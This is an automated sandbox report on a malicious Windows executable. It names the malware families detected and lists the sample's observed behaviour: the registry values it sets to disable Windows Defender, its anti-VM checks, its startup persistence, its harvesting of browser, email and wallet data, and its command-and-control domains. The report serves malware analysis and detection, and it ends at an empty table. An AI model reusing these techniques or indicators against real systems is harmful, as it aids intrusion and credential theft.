Analysis Overview
SHA256
a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972
Threat Level: Known bad
The file a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972 was found to be: Known bad.
Malicious Activity Summary
Amadey family
Systembc family
SystemBC
GCleaner
Healer
Vidar
Modifies Windows Defender TamperProtection settings
Amadey
Healer family
Modifies Windows Defender DisableAntiSpyware settings
Vidar family
Modifies Windows Defender notification settings
Litehttp family
Detect Vidar Stealer
Detects Healer an antivirus disabler dropper
Stealc family
LiteHTTP
Gcleaner family
Stealc
Modifies Windows Defender Real-time Protection settings
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Downloads MZ/PE file
Reads user/profile data of local email clients
.NET Reactor proctector
Executes dropped EXE
Drops startup file
Reads user/profile data of web browsers
Checks computer location settings
Unsecured Credentials: Credentials In Files
Checks BIOS information in registry
Identifies Wine through registry keys
Windows security modification
Adds Run key to start application
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Suspicious use of SetThreadContext
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Program crash
Browser Information Discovery
Kills process with taskkill
Delays execution with timeout.exe
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Checks processor information in registry
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-06 02:07
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-06 02:07
Reported
2025-03-06 02:10
Platform
win7-20240903-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
Browser Information Discovery
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2160 wrote to memory of 2556 | N/A | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2160 wrote to memory of 2556 | N/A | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2160 wrote to memory of 2556 | N/A | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2160 wrote to memory of 2556 | N/A | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe
"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 1224
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | hardswarehub.today | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | hardrwarehaven.run | udp |
| US | 8.8.8.8:53 | techmindzs.live | udp |
| US | 8.8.8.8:53 | codxefusion.top | udp |
| US | 104.21.69.194:443 | codxefusion.top | tcp |
Files
memory/2160-0-0x00000000013B0000-0x00000000016BD000-memory.dmp
memory/2160-1-0x0000000077400000-0x0000000077402000-memory.dmp
memory/2160-3-0x00000000013B0000-0x00000000016BD000-memory.dmp
memory/2160-2-0x00000000013B1000-0x0000000001411000-memory.dmp
memory/2160-4-0x00000000013B0000-0x00000000016BD000-memory.dmp
memory/2160-5-0x00000000013B0000-0x00000000016BD000-memory.dmp
memory/2160-6-0x00000000013B0000-0x00000000016BD000-memory.dmp
memory/2160-7-0x00000000013B1000-0x0000000001411000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-06 02:07
Reported
2025-03-06 02:10
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
Stealc
Stealc family
SystemBC
Systembc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\bcngpqs\ovql.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\bcngpqs\ovql.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\bcngpqs\ovql.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe | C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe | C:\Users\Admin\AppData\Local\Temp\10109250101\zY9sqWs.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\OPC2VURIHUPRBGIGMXLLRVVJD.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempSXNXTUO2YUFRJMDVXLUKTVUPGKSQEA6H.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109130101\1590993906.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\0IR2HSX48POW1VIT6VA.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109260101\f9510b80e8.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109140101\be9629c306.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109090101\721702bd23.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\ProgramData\bcngpqs\ovql.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109110101\36bd318e4d.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109120101\acdc33ee92.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10109160101\dd3907672e.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
